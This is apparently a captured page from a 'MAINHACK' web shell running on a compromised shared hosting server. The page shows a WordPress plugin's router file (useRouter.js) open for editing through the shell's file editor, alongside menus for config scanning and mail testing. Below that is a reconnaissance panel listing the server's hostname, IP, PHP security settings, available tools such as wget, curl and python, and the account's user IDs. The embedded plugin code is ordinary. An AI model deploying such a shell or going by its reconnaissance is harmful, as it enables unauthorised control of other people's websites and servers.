[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: useRouter.js
import apiFetch from '@wordpress/api-fetch'; import { useCallback, useEffect } from '@wordpress/element'; import { useActivityStore } from '@shared/state/activity'; import { create } from 'zustand'; import { devtools, persist, createJSONStorage } from 'zustand/middleware'; import { routes as aiRoutes } from '@draft/pages/GenerateImage'; import { routes as generalRoutes } from '@draft/pages/Home'; import { routes as unsplashRoutes } from '@draft/pages/Unsplash'; const pages = [...generalRoutes, ...aiRoutes, ...unsplashRoutes]; const state = (set, get) => ({ history: [], viewedPages: [], current: null, goBack: () => { if (get().history.length < 2) return; const nextPage = get().history[1]; useActivityStore .getState() .incrementActivity(`draft-${nextPage.slug}-back`); set((state) => ({ history: state.history.slice(1), current: nextPage, })); }, setCurrent: (page) => { if (!page) return; // If history is the same, dont add (they pressed the same button) if (get().history[0]?.slug === page.slug) return; set((state) => { const lastViewedAt = new Date().toISOString(); const firstViewedAt = lastViewedAt; const visited = state.viewedPages.find((a) => a.slug === page.slug); return { history: [page, ...state.history].filter(Boolean), current: page, viewedPages: [ // Remove the page if it's already in the list ...state.viewedPages.filter((a) => a.slug !== page.slug), // Either add the page or update the count visited ? { ...visited, count: visited.count + 1, lastViewedAt } : { slug: page.slug, firstViewedAt, lastViewedAt, count: 1, }, ], }; }); }, }); const path = '/extendify/v1/draft/router-data'; const storage = { getItem: async () => await apiFetch({ path }), setItem: async (_name, state) => await apiFetch({ path, method: 'POST', data: { state } }), }; const useRouterState = create( persist(devtools(state, { name: 'Extendify Draft Router' }), { name: 'extendify-draft-router', storage: createJSONStorage(() => storage), skipHydration: true, partialize: ({ viewedPages }) => ({ viewedPages }), }), ); export const useRouter = () => { const { current, setCurrent, history, goBack } = useRouterState(); const Component = current?.component ?? (() => null); useEffect(() => { if (current) return; setCurrent(pages[0]); }, [current, setCurrent]); return { current, CurrentPage: useCallback( () => ( <div role="region" aria-live="polite" className="h-full"> {/* Announce to SR on change */} <h1 className="sr-only">{current?.title}</h1> <Component /> </div> ), [current], ), navigateTo: (slug) => { const page = pages.find((a) => a.slug === slug); if (!page) return setCurrent(pages[0]); useActivityStore.getState().incrementActivity(`draft-${page.slug}`); setCurrent(page); }, goBack, history, }; };
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium166.web-hosting.com
Server IP: 162.0.209.40
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium166.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 75.3 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: kataubyb
User ID (UID): 624
Group ID (GID): 625
Script Owner UID: 624
Current Dir Owner: 624